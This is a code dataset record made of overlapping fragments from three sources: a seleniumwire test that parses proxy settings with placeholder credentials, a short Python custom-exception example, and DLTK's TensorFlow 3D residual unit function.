self.assertEqual('https', https.scheme) self.assertEqual('username3', https.username) self.assertEqual('password3', https.password) self.assertEqual('server3:8888', https.hostport) 
self.assertEqual('localhost', proxy['no_proxy']) def", "self.assertEqual('password3', https.password) self.assertEqual('server3:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_none(self): options = None proxy =", "used to temporarily set environment vars.\"\"\" old_environ = dict(os.environ) os.environ.update(environ) try: yield finally:", "self.assertEqual('server3:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def test_none(self): options = None proxy = get_upstream_proxy(options) self.assertEqual({},", "} } with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='127.0.0.1'): proxy = get_upstream_proxy(options) http = proxy['http'] self.assertEqual('http',", "'proxy': { 'https': 'https://username3:password3@server3:8888', 'no_proxy': 'localhost' } } with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='127.0.0.1'): proxy", "options = None proxy = get_upstream_proxy(options) self.assertEqual({}, proxy) @contextlib.contextmanager def set_env(self, **environ): \"\"\"Context", "= proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy']) def", "**environ): \"\"\"Context manager used to temporarily set environment vars.\"\"\" old_environ = dict(os.environ) os.environ.update(environ)", "proxy = get_upstream_proxy(options) self.assertEqual({}, proxy) @contextlib.contextmanager def set_env(self, **environ): \"\"\"Context manager used to", "test_get_from_env(self): with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888', HTTPS_PROXY='https://username2:password2@server2:8888', NO_PROXY='localhost'): proxy = get_upstream_proxy({}) http = proxy['http'] 
self.assertEqual('http', http.scheme)", "import get_upstream_proxy class GetUpstreamProxyTest(TestCase): def test_get_config(self): options = { 'proxy': { 'http': 'http://username1:password1@server1:8888',", "import contextlib import os from unittest import TestCase from seleniumwire.proxy.utils import get_upstream_proxy class", "self.assertEqual('http', http.scheme) self.assertEqual('username1', http.username) self.assertEqual('password1', http.password) self.assertEqual('server1:8888', http.hostport) https = proxy['https'] self.assertEqual('https', https.scheme)", "options = { 'proxy': { 'https': 'https://username3:password3@server3:8888', 'no_proxy': 'localhost' } } with self.set_env(HTTP_PROXY='http://username1:password1@server1:8888',", "import TestCase from seleniumwire.proxy.utils import get_upstream_proxy class GetUpstreamProxyTest(TestCase): def test_get_config(self): options = {", "http.password) self.assertEqual('server1:8888', http.hostport) https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username2', https.username) self.assertEqual('password2', https.password) self.assertEqual('server2:8888',", "https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username3', https.username) self.assertEqual('password3', https.password) self.assertEqual('server3:8888', https.hostport) self.assertEqual('localhost', proxy['no_proxy'])", "to temporarily set environment vars.\"\"\" old_environ = dict(os.environ) os.environ.update(environ) try: yield finally: os.environ.clear()", "defined in env variables https = proxy['https'] self.assertEqual('https', https.scheme) self.assertEqual('username3', https.username) self.assertEqual('password3', https.password)", "set_env(self, **environ): \"\"\"Context manager used to temporarily set environment vars.\"\"\" old_environ = dict(os.environ)" ]
[ "**kwargs): super().__init__(*args, **kwargs) # More code here if needed raise SpecialError('stuff and things',", "def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) # More code here if needed raise", "SpecialError(BaseErrorInheretence): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) # More code here if needed", "<reponame>Xithrius/Examples class BaseErrorInheretence(Exception): pass class SpecialError(BaseErrorInheretence): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) #", "super().__init__(*args, **kwargs) # More code here if needed raise SpecialError('stuff and things', error='something", "__init__(self, *args, **kwargs): super().__init__(*args, **kwargs) # More code here if needed raise SpecialError('stuff", "*args, **kwargs): super().__init__(*args, **kwargs) # More code here if needed raise SpecialError('stuff and", "pass class SpecialError(BaseErrorInheretence): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) # More code here", "class SpecialError(BaseErrorInheretence): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) # More code here if", "BaseErrorInheretence(Exception): pass class SpecialError(BaseErrorInheretence): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) # More code", "**kwargs) # More code here if needed raise SpecialError('stuff and things', error='something happened')", "class BaseErrorInheretence(Exception): pass class SpecialError(BaseErrorInheretence): def __init__(self, *args, **kwargs): super().__init__(*args, **kwargs) # More" ]
[ "padding='valid') # Sub unit 0 with tf.variable_scope('sub_unit0'): # Adjust the strided conv kernel", "(None, optional): Additional regularisation op bias_regularizer (None, optional): Additional regularisation op Returns: tf.Tensor:", "<NAME> et al. Identity Mappings in Deep Residual Networks. ECCV 2016. Args: inputs", "= x # Handle strided convolutions if np.prod(strides) != 1: orig_x = pool_op(inputs=orig_x,", "a 3D residual unit according to [1]. This implementation supports strided convolutions and", "else k for k, s in zip(kernel_size, strides)] x = tf.layers.batch_normalization( x, training=mode", "Handle strided convolutions if np.prod(strides) != 1: orig_x = pool_op(inputs=orig_x, pool_size=strides, strides=strides, padding='valid')", "input shape' x = inputs orig_x = x # Handle strided convolutions if", "activation function. use_bias (bool, optional): Train a bias with each convolution. kernel_initializer (TYPE,", "EVAL or PREDICT activation (optional): A function to use as activation function. use_bias", "as np def vanilla_residual_unit_3d(inputs, out_filters, kernel_size=(3, 3, 3), strides=(1, 1, 1), mode=tf.estimator.ModeKeys.EVAL, use_bias=False,", "tf.Tensor: Output of the residual unit \"\"\" pool_op = tf.layers.max_pooling3d conv_params = {'padding':", "__future__ import print_function from __future__ import division from __future__ import absolute_import import tensorflow", "the strided conv kernel size to prevent losing information k = [s *", "used in the sub units strides (tuple, optional): Convolution strides in (x,y,z) of", "the sub units. kernel_size (tuple, optional): Size of the convoltional kernels used in", "output filters. [1] <NAME> et al. Identity Mappings in Deep Residual Networks. ECCV", "Train a bias with each convolution. 
kernel_initializer (TYPE, optional): Initialisation of convolution kernels", "with tf.variable_scope('sub_unit0'): # Adjust the strided conv kernel size to prevent losing information", "zip(kernel_size, strides)] x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x) x", "strides convolutions. mode (str, optional): One of the tf.estimator.ModeKeys: TRAIN, EVAL or PREDICT", "# Handle differences in input and output filter sizes if in_filters < out_filters:", "0 with tf.variable_scope('sub_unit0'): # Adjust the strided conv kernel size to prevent losing", "bias with each convolution. kernel_initializer (TYPE, optional): Initialisation of convolution kernels bias_initializer (TYPE,", "== inputs.get_shape().as_list()[-1], \\ 'Module was initialised for a different input shape' x =", "1) + [[ int(np.floor((out_filters - in_filters) / 2.)), int(np.ceil((out_filters - in_filters) / 2.))]])", "sub unit 0. Allows downsampling of the input tensor via strides convolutions. mode", "# Sub unit 1 with tf.variable_scope('sub_unit1'): x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN)", "Convolution strides in (x,y,z) of sub unit 0. Allows downsampling of the input", "of a 3D residual unit according to [1]. This implementation supports strided convolutions", "units. 
kernel_size (tuple, optional): Size of the convoltional kernels used in the sub", "__future__ import division from __future__ import absolute_import import tensorflow as tf import numpy", "kernel_regularizer (None, optional): Additional regularisation op bias_regularizer (None, optional): Additional regularisation op Returns:", "use_bias=False, activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(), kernel_regularizer=None, bias_regularizer=None): \"\"\"Implementation of a 3D residual unit according", "\\ 'Module was initialised for a different input shape' x = inputs orig_x", "and output filter sizes if in_filters < out_filters: orig_x = tf.pad( tensor=orig_x, paddings=[[0,", "Args: inputs (tf.Tensor): Input tensor to the residual unit. Is required to have", "y, z, channels]). out_filters (int): Number of convolutional filters used in the sub", "optional): Additional regularisation op Returns: tf.Tensor: Output of the residual unit \"\"\" pool_op", "in_filters < out_filters: orig_x = tf.pad( tensor=orig_x, paddings=[[0, 0]] * (len(x.get_shape().as_list()) - 1)", "tf.layers.max_pooling3d conv_params = {'padding': 'same', 'use_bias': use_bias, 'kernel_initializer': kernel_initializer, 'bias_initializer': bias_initializer, 'kernel_regularizer': kernel_regularizer,", "to use as activation function. use_bias (bool, optional): Train a bias with each", "<reponame>themantalope/DLTK<filename>dltk/core/residual_unit.py from __future__ import unicode_literals from __future__ import print_function from __future__ import division", "tf.pad( tensor=orig_x, paddings=[[0, 0]] * (len(x.get_shape().as_list()) - 1) + [[ int(np.floor((out_filters - in_filters)", "1), **conv_params) # Add the residual with tf.variable_scope('sub_unit_add'): # Handle differences in input", "kernel_size (tuple, optional): Size of the convoltional kernels used in the sub units", "2016. 
Args: inputs (tf.Tensor): Input tensor to the residual unit. Is required to", "'kernel_regularizer': kernel_regularizer, 'bias_regularizer': bias_regularizer} in_filters = inputs.get_shape().as_list()[-1] assert in_filters == inputs.get_shape().as_list()[-1], \\ 'Module", "and output filters. [1] <NAME> et al. Identity Mappings in Deep Residual Networks.", "# Handle strided convolutions if np.prod(strides) != 1: orig_x = pool_op(inputs=orig_x, pool_size=strides, strides=strides,", "+ [[ int(np.floor((out_filters - in_filters) / 2.)), int(np.ceil((out_filters - in_filters) / 2.))]]) elif", "a different input shape' x = inputs orig_x = x # Handle strided", "Networks. ECCV 2016. Args: inputs (tf.Tensor): Input tensor to the residual unit. Is", "Allows downsampling of the input tensor via strides convolutions. mode (str, optional): One", "with each convolution. kernel_initializer (TYPE, optional): Initialisation of convolution kernels bias_initializer (TYPE, optional):", "absolute_import import tensorflow as tf import numpy as np def vanilla_residual_unit_3d(inputs, out_filters, kernel_size=(3,", "implementation supports strided convolutions and automatically handles different input and output filters. [1]", "orig_x = tf.pad( tensor=orig_x, paddings=[[0, 0]] * (len(x.get_shape().as_list()) - 1) + [[ int(np.floor((out_filters", "import unicode_literals from __future__ import print_function from __future__ import division from __future__ import", "ECCV 2016. Args: inputs (tf.Tensor): Input tensor to the residual unit. Is required", "(x,y,z) of sub unit 0. Allows downsampling of the input tensor via strides", "different input and output filters. [1] <NAME> et al. 
Identity Mappings in Deep", "Initialisation of convolution kernels bias_initializer (TYPE, optional): Initialisation of bias kernel_regularizer (None, optional):", "orig_x = pool_op(inputs=orig_x, pool_size=strides, strides=strides, padding='valid') # Sub unit 0 with tf.variable_scope('sub_unit0'): #", "tf.variable_scope('sub_unit0'): # Adjust the strided conv kernel size to prevent losing information k", "out_filters: orig_x = tf.layers.conv3d( inputs=orig_x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) x +=", "vanilla_residual_unit_3d(inputs, out_filters, kernel_size=(3, 3, 3), strides=(1, 1, 1), mode=tf.estimator.ModeKeys.EVAL, use_bias=False, activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(),", "out_filters (int): Number of convolutional filters used in the sub units. kernel_size (tuple,", "the residual unit. Is required to have a rank of 5 (i.e. [batch,", "5 (i.e. [batch, x, y, z, channels]). out_filters (int): Number of convolutional filters", "strides=strides, padding='valid') # Sub unit 0 with tf.variable_scope('sub_unit0'): # Adjust the strided conv", "in_filters) / 2.)), int(np.ceil((out_filters - in_filters) / 2.))]]) elif in_filters > out_filters: orig_x", "Adjust the strided conv kernel size to prevent losing information k = [s", "from __future__ import print_function from __future__ import division from __future__ import absolute_import import", "Deep Residual Networks. ECCV 2016. 
Args: inputs (tf.Tensor): Input tensor to the residual", "== tf.estimator.ModeKeys.TRAIN) x = activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=k, strides=strides, **conv_params)", "activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(), kernel_regularizer=None, bias_regularizer=None): \"\"\"Implementation of a 3D residual unit according to", "x, training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=kernel_size,", "if np.prod(strides) != 1: orig_x = pool_op(inputs=orig_x, pool_size=strides, strides=strides, padding='valid') # Sub unit", "according to [1]. This implementation supports strided convolutions and automatically handles different input", "= tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) # Add the residual", "bias_initializer=tf.zeros_initializer(), kernel_regularizer=None, bias_regularizer=None): \"\"\"Implementation of a 3D residual unit according to [1]. This", "have a rank of 5 (i.e. [batch, x, y, z, channels]). out_filters (int):", "(tuple, optional): Size of the convoltional kernels used in the sub units strides", "of 5 (i.e. [batch, x, y, z, channels]). out_filters (int): Number of convolutional", "activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=k, strides=strides, **conv_params) # Sub unit 1", "out_filters: orig_x = tf.pad( tensor=orig_x, paddings=[[0, 0]] * (len(x.get_shape().as_list()) - 1) + [[", "unit 0 with tf.variable_scope('sub_unit0'): # Adjust the strided conv kernel size to prevent", "strides in (x,y,z) of sub unit 0. Allows downsampling of the input tensor", "filter sizes if in_filters < out_filters: orig_x = tf.pad( tensor=orig_x, paddings=[[0, 0]] *", "of the input tensor via strides convolutions. mode (str, optional): One of the", "via strides convolutions. 
mode (str, optional): One of the tf.estimator.ModeKeys: TRAIN, EVAL or", "(i.e. [batch, x, y, z, channels]). out_filters (int): Number of convolutional filters used", "in the sub units strides (tuple, optional): Convolution strides in (x,y,z) of sub", "__future__ import absolute_import import tensorflow as tf import numpy as np def vanilla_residual_unit_3d(inputs,", "'same', 'use_bias': use_bias, 'kernel_initializer': kernel_initializer, 'bias_initializer': bias_initializer, 'kernel_regularizer': kernel_regularizer, 'bias_regularizer': bias_regularizer} in_filters =", "tf.layers.conv3d( inputs=orig_x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) x += orig_x return x", "unit according to [1]. This implementation supports strided convolutions and automatically handles different", "in zip(kernel_size, strides)] x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x)", "if in_filters < out_filters: orig_x = tf.pad( tensor=orig_x, paddings=[[0, 0]] * (len(x.get_shape().as_list()) -", "of the tf.estimator.ModeKeys: TRAIN, EVAL or PREDICT activation (optional): A function to use", "handles different input and output filters. [1] <NAME> et al. Identity Mappings in", "channels]). out_filters (int): Number of convolutional filters used in the sub units. 
kernel_size", "in input and output filter sizes if in_filters < out_filters: orig_x = tf.pad(", "assert in_filters == inputs.get_shape().as_list()[-1], \\ 'Module was initialised for a different input shape'", "out_filters, kernel_size=(3, 3, 3), strides=(1, 1, 1), mode=tf.estimator.ModeKeys.EVAL, use_bias=False, activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(), kernel_regularizer=None,", "sub units strides (tuple, optional): Convolution strides in (x,y,z) of sub unit 0.", "shape' x = inputs orig_x = x # Handle strided convolutions if np.prod(strides)", "Output of the residual unit \"\"\" pool_op = tf.layers.max_pooling3d conv_params = {'padding': 'same',", "unit \"\"\" pool_op = tf.layers.max_pooling3d conv_params = {'padding': 'same', 'use_bias': use_bias, 'kernel_initializer': kernel_initializer,", "> out_filters: orig_x = tf.layers.conv3d( inputs=orig_x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) x", "kernel_initializer, 'bias_initializer': bias_initializer, 'kernel_regularizer': kernel_regularizer, 'bias_regularizer': bias_regularizer} in_filters = inputs.get_shape().as_list()[-1] assert in_filters ==", "as tf import numpy as np def vanilla_residual_unit_3d(inputs, out_filters, kernel_size=(3, 3, 3), strides=(1,", "1 with tf.variable_scope('sub_unit1'): x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x)", "tf.estimator.ModeKeys.TRAIN) x = activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=k, strides=strides, **conv_params) #", "optional): One of the tf.estimator.ModeKeys: TRAIN, EVAL or PREDICT activation (optional): A function", "3, 3), strides=(1, 1, 1), mode=tf.estimator.ModeKeys.EVAL, use_bias=False, activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(), 
kernel_regularizer=None, bias_regularizer=None): \"\"\"Implementation", "# Adjust the strided conv kernel size to prevent losing information k =", "for a different input shape' x = inputs orig_x = x # Handle", "conv kernel size to prevent losing information k = [s * 2 if", "kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(), kernel_regularizer=None, bias_regularizer=None): \"\"\"Implementation of a 3D residual unit according to [1].", "[batch, x, y, z, channels]). out_filters (int): Number of convolutional filters used in", "numpy as np def vanilla_residual_unit_3d(inputs, out_filters, kernel_size=(3, 3, 3), strides=(1, 1, 1), mode=tf.estimator.ModeKeys.EVAL,", "= inputs.get_shape().as_list()[-1] assert in_filters == inputs.get_shape().as_list()[-1], \\ 'Module was initialised for a different", "optional): Convolution strides in (x,y,z) of sub unit 0. Allows downsampling of the", "x = activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=k, strides=strides, **conv_params) # Sub", "TRAIN, EVAL or PREDICT activation (optional): A function to use as activation function.", "= activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) #", "'use_bias': use_bias, 'kernel_initializer': kernel_initializer, 'bias_initializer': bias_initializer, 'kernel_regularizer': kernel_regularizer, 'bias_regularizer': bias_regularizer} in_filters = inputs.get_shape().as_list()[-1]", "__future__ import unicode_literals from __future__ import print_function from __future__ import division from __future__", "residual unit according to [1]. 
This implementation supports strided convolutions and automatically handles", "Size of the convoltional kernels used in the sub units strides (tuple, optional):", "was initialised for a different input shape' x = inputs orig_x = x", "k, s in zip(kernel_size, strides)] x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x", "inputs.get_shape().as_list()[-1], \\ 'Module was initialised for a different input shape' x = inputs", "to [1]. This implementation supports strided convolutions and automatically handles different input and", "sizes if in_filters < out_filters: orig_x = tf.pad( tensor=orig_x, paddings=[[0, 0]] * (len(x.get_shape().as_list())", "np.prod(strides) != 1: orig_x = pool_op(inputs=orig_x, pool_size=strides, strides=strides, padding='valid') # Sub unit 0", "elif in_filters > out_filters: orig_x = tf.layers.conv3d( inputs=orig_x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1),", "from __future__ import division from __future__ import absolute_import import tensorflow as tf import", "tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) # Add the residual with", "strides)] x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x) x =", "> 1 else k for k, s in zip(kernel_size, strides)] x = tf.layers.batch_normalization(", "supports strided convolutions and automatically handles different input and output filters. [1] <NAME>", "- in_filters) / 2.)), int(np.ceil((out_filters - in_filters) / 2.))]]) elif in_filters > out_filters:", "strides=strides, **conv_params) # Sub unit 1 with tf.variable_scope('sub_unit1'): x = tf.layers.batch_normalization( x, training=mode", "3D residual unit according to [1]. This implementation supports strided convolutions and automatically", "to the residual unit. 
Is required to have a rank of 5 (i.e.", "[[ int(np.floor((out_filters - in_filters) / 2.)), int(np.ceil((out_filters - in_filters) / 2.))]]) elif in_filters", "in the sub units. kernel_size (tuple, optional): Size of the convoltional kernels used", "s in zip(kernel_size, strides)] x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x =", "bias_regularizer (None, optional): Additional regularisation op Returns: tf.Tensor: Output of the residual unit", "activation (optional): A function to use as activation function. use_bias (bool, optional): Train", "mode=tf.estimator.ModeKeys.EVAL, use_bias=False, activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(), kernel_regularizer=None, bias_regularizer=None): \"\"\"Implementation of a 3D residual unit", "function to use as activation function. use_bias (bool, optional): Train a bias with", "rank of 5 (i.e. [batch, x, y, z, channels]). out_filters (int): Number of", "required to have a rank of 5 (i.e. [batch, x, y, z, channels]).", "convolutions and automatically handles different input and output filters. [1] <NAME> et al.", "filters used in the sub units. 
kernel_size (tuple, optional): Size of the convoltional", "< out_filters: orig_x = tf.pad( tensor=orig_x, paddings=[[0, 0]] * (len(x.get_shape().as_list()) - 1) +", "in_filters == inputs.get_shape().as_list()[-1], \\ 'Module was initialised for a different input shape' x", "op bias_regularizer (None, optional): Additional regularisation op Returns: tf.Tensor: Output of the residual", "kernel_size=k, strides=strides, **conv_params) # Sub unit 1 with tf.variable_scope('sub_unit1'): x = tf.layers.batch_normalization( x,", "x, training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=k,", "output filter sizes if in_filters < out_filters: orig_x = tf.pad( tensor=orig_x, paddings=[[0, 0]]", "the convoltional kernels used in the sub units strides (tuple, optional): Convolution strides", "tf.variable_scope('sub_unit1'): x = tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x) x =", "filters=out_filters, kernel_size=k, strides=strides, **conv_params) # Sub unit 1 with tf.variable_scope('sub_unit1'): x = tf.layers.batch_normalization(", "= pool_op(inputs=orig_x, pool_size=strides, strides=strides, padding='valid') # Sub unit 0 with tf.variable_scope('sub_unit0'): # Adjust", "2 if s > 1 else k for k, s in zip(kernel_size, strides)]", "tensor via strides convolutions. mode (str, optional): One of the tf.estimator.ModeKeys: TRAIN, EVAL", "paddings=[[0, 0]] * (len(x.get_shape().as_list()) - 1) + [[ int(np.floor((out_filters - in_filters) / 2.)),", "function. use_bias (bool, optional): Train a bias with each convolution. 
kernel_initializer (TYPE, optional):", "the residual unit \"\"\" pool_op = tf.layers.max_pooling3d conv_params = {'padding': 'same', 'use_bias': use_bias,", "(TYPE, optional): Initialisation of convolution kernels bias_initializer (TYPE, optional): Initialisation of bias kernel_regularizer", "of the convoltional kernels used in the sub units strides (tuple, optional): Convolution", "bias kernel_regularizer (None, optional): Additional regularisation op bias_regularizer (None, optional): Additional regularisation op", "al. Identity Mappings in Deep Residual Networks. ECCV 2016. Args: inputs (tf.Tensor): Input", "= tf.layers.conv3d( inputs=orig_x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) x += orig_x return", "(optional): A function to use as activation function. use_bias (bool, optional): Train a", "tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters,", "a rank of 5 (i.e. [batch, x, y, z, channels]). out_filters (int): Number", "x = inputs orig_x = x # Handle strided convolutions if np.prod(strides) !=", "input and output filters. [1] <NAME> et al. Identity Mappings in Deep Residual", "optional): Size of the convoltional kernels used in the sub units strides (tuple,", "tensor=orig_x, paddings=[[0, 0]] * (len(x.get_shape().as_list()) - 1) + [[ int(np.floor((out_filters - in_filters) /", "Identity Mappings in Deep Residual Networks. ECCV 2016. Args: inputs (tf.Tensor): Input tensor", "2.)), int(np.ceil((out_filters - in_filters) / 2.))]]) elif in_filters > out_filters: orig_x = tf.layers.conv3d(", "(int): Number of convolutional filters used in the sub units. kernel_size (tuple, optional):", "residual unit. Is required to have a rank of 5 (i.e. [batch, x,", "Sub unit 0 with tf.variable_scope('sub_unit0'): # Adjust the strided conv kernel size to", "losing information k = [s * 2 if s > 1 else k", "filters. [1] <NAME> et al. 
Identity Mappings in Deep Residual Networks. ECCV 2016.", "1, 1), mode=tf.estimator.ModeKeys.EVAL, use_bias=False, activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(), kernel_regularizer=None, bias_regularizer=None): \"\"\"Implementation of a 3D", "kernel size to prevent losing information k = [s * 2 if s", "PREDICT activation (optional): A function to use as activation function. use_bias (bool, optional):", "kernel_regularizer=None, bias_regularizer=None): \"\"\"Implementation of a 3D residual unit according to [1]. This implementation", "import numpy as np def vanilla_residual_unit_3d(inputs, out_filters, kernel_size=(3, 3, 3), strides=(1, 1, 1),", "if s > 1 else k for k, s in zip(kernel_size, strides)] x", "int(np.floor((out_filters - in_filters) / 2.)), int(np.ceil((out_filters - in_filters) / 2.))]]) elif in_filters >", "tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=k, strides=strides, **conv_params) # Sub unit 1 with tf.variable_scope('sub_unit1'): x", "information k = [s * 2 if s > 1 else k for", "size to prevent losing information k = [s * 2 if s >", "Add the residual with tf.variable_scope('sub_unit_add'): # Handle differences in input and output filter", "3), strides=(1, 1, 1), mode=tf.estimator.ModeKeys.EVAL, use_bias=False, activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'), bias_initializer=tf.zeros_initializer(), kernel_regularizer=None, bias_regularizer=None): \"\"\"Implementation of", "* (len(x.get_shape().as_list()) - 1) + [[ int(np.floor((out_filters - in_filters) / 2.)), int(np.ceil((out_filters -", "np def vanilla_residual_unit_3d(inputs, out_filters, kernel_size=(3, 3, 3), strides=(1, 1, 1), mode=tf.estimator.ModeKeys.EVAL, use_bias=False, activation=tf.nn.relu6,", "orig_x = tf.layers.conv3d( inputs=orig_x, filters=out_filters, kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) x += 
orig_x", "of sub unit 0. Allows downsampling of the input tensor via strides convolutions.", "x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=k, strides=strides, **conv_params) # Sub unit 1 with", "strides=(1, 1, 1), **conv_params) # Add the residual with tf.variable_scope('sub_unit_add'): # Handle differences", "training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=k, strides=strides,", "optional): Additional regularisation op bias_regularizer (None, optional): Additional regularisation op Returns: tf.Tensor: Output", "use_bias (bool, optional): Train a bias with each convolution. kernel_initializer (TYPE, optional): Initialisation", "input and output filter sizes if in_filters < out_filters: orig_x = tf.pad( tensor=orig_x,", "!= 1: orig_x = pool_op(inputs=orig_x, pool_size=strides, strides=strides, padding='valid') # Sub unit 0 with", "def vanilla_residual_unit_3d(inputs, out_filters, kernel_size=(3, 3, 3), strides=(1, 1, 1), mode=tf.estimator.ModeKeys.EVAL, use_bias=False, activation=tf.nn.relu6, kernel_initializer=tf.initializers.variance_scaling(distribution='uniform'),", "and automatically handles different input and output filters. [1] <NAME> et al. 
Identity", "kernel_regularizer, 'bias_regularizer': bias_regularizer} in_filters = inputs.get_shape().as_list()[-1] assert in_filters == inputs.get_shape().as_list()[-1], \\ 'Module was", "bias_initializer (TYPE, optional): Initialisation of bias kernel_regularizer (None, optional): Additional regularisation op bias_regularizer", "inputs orig_x = x # Handle strided convolutions if np.prod(strides) != 1: orig_x", "= tf.layers.batch_normalization( x, training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x) x = tf.layers.conv3d( inputs=x,", "1 else k for k, s in zip(kernel_size, strides)] x = tf.layers.batch_normalization( x,", "kernel_initializer (TYPE, optional): Initialisation of convolution kernels bias_initializer (TYPE, optional): Initialisation of bias", "training=mode == tf.estimator.ModeKeys.TRAIN) x = activation(x) x = tf.layers.conv3d( inputs=x, filters=out_filters, kernel_size=kernel_size, strides=(1,", "to have a rank of 5 (i.e. [batch, x, y, z, channels]). out_filters", "et al. Identity Mappings in Deep Residual Networks. ECCV 2016. Args: inputs (tf.Tensor):", "One of the tf.estimator.ModeKeys: TRAIN, EVAL or PREDICT activation (optional): A function to", "import absolute_import import tensorflow as tf import numpy as np def vanilla_residual_unit_3d(inputs, out_filters,", "in (x,y,z) of sub unit 0. Allows downsampling of the input tensor via", "in_filters) / 2.))]]) elif in_filters > out_filters: orig_x = tf.layers.conv3d( inputs=orig_x, filters=out_filters, kernel_size=kernel_size,", "Number of convolutional filters used in the sub units. 
kernel_size (tuple, optional): Size", "inputs=x, filters=out_filters, kernel_size=k, strides=strides, **conv_params) # Sub unit 1 with tf.variable_scope('sub_unit1'): x =", "kernel_size=kernel_size, strides=(1, 1, 1), **conv_params) # Add the residual with tf.variable_scope('sub_unit_add'): # Handle", "import tensorflow as tf import numpy as np def vanilla_residual_unit_3d(inputs, out_filters, kernel_size=(3, 3,", "bias_regularizer=None): \"\"\"Implementation of a 3D residual unit according to [1]. This implementation supports", "used in the sub units. kernel_size (tuple, optional): Size of the convoltional kernels", "optional): Train a bias with each convolution. kernel_initializer (TYPE, optional): Initialisation of convolution", "strided conv kernel size to prevent losing information k = [s * 2", "regularisation op Returns: tf.Tensor: Output of the residual unit \"\"\" pool_op = tf.layers.max_pooling3d", "convolution kernels bias_initializer (TYPE, optional): Initialisation of bias kernel_regularizer (None, optional): Additional regularisation", "* 2 if s > 1 else k for k, s in zip(kernel_size,", "[1]. This implementation supports strided convolutions and automatically handles different input and output", "Is required to have a rank of 5 (i.e. [batch, x, y, z,", "= {'padding': 'same', 'use_bias': use_bias, 'kernel_initializer': kernel_initializer, 'bias_initializer': bias_initializer, 'kernel_regularizer': kernel_regularizer, 'bias_regularizer': bias_regularizer}", "(len(x.get_shape().as_list()) - 1) + [[ int(np.floor((out_filters - in_filters) / 2.)), int(np.ceil((out_filters - in_filters)", "convolutional filters used in the sub units. 
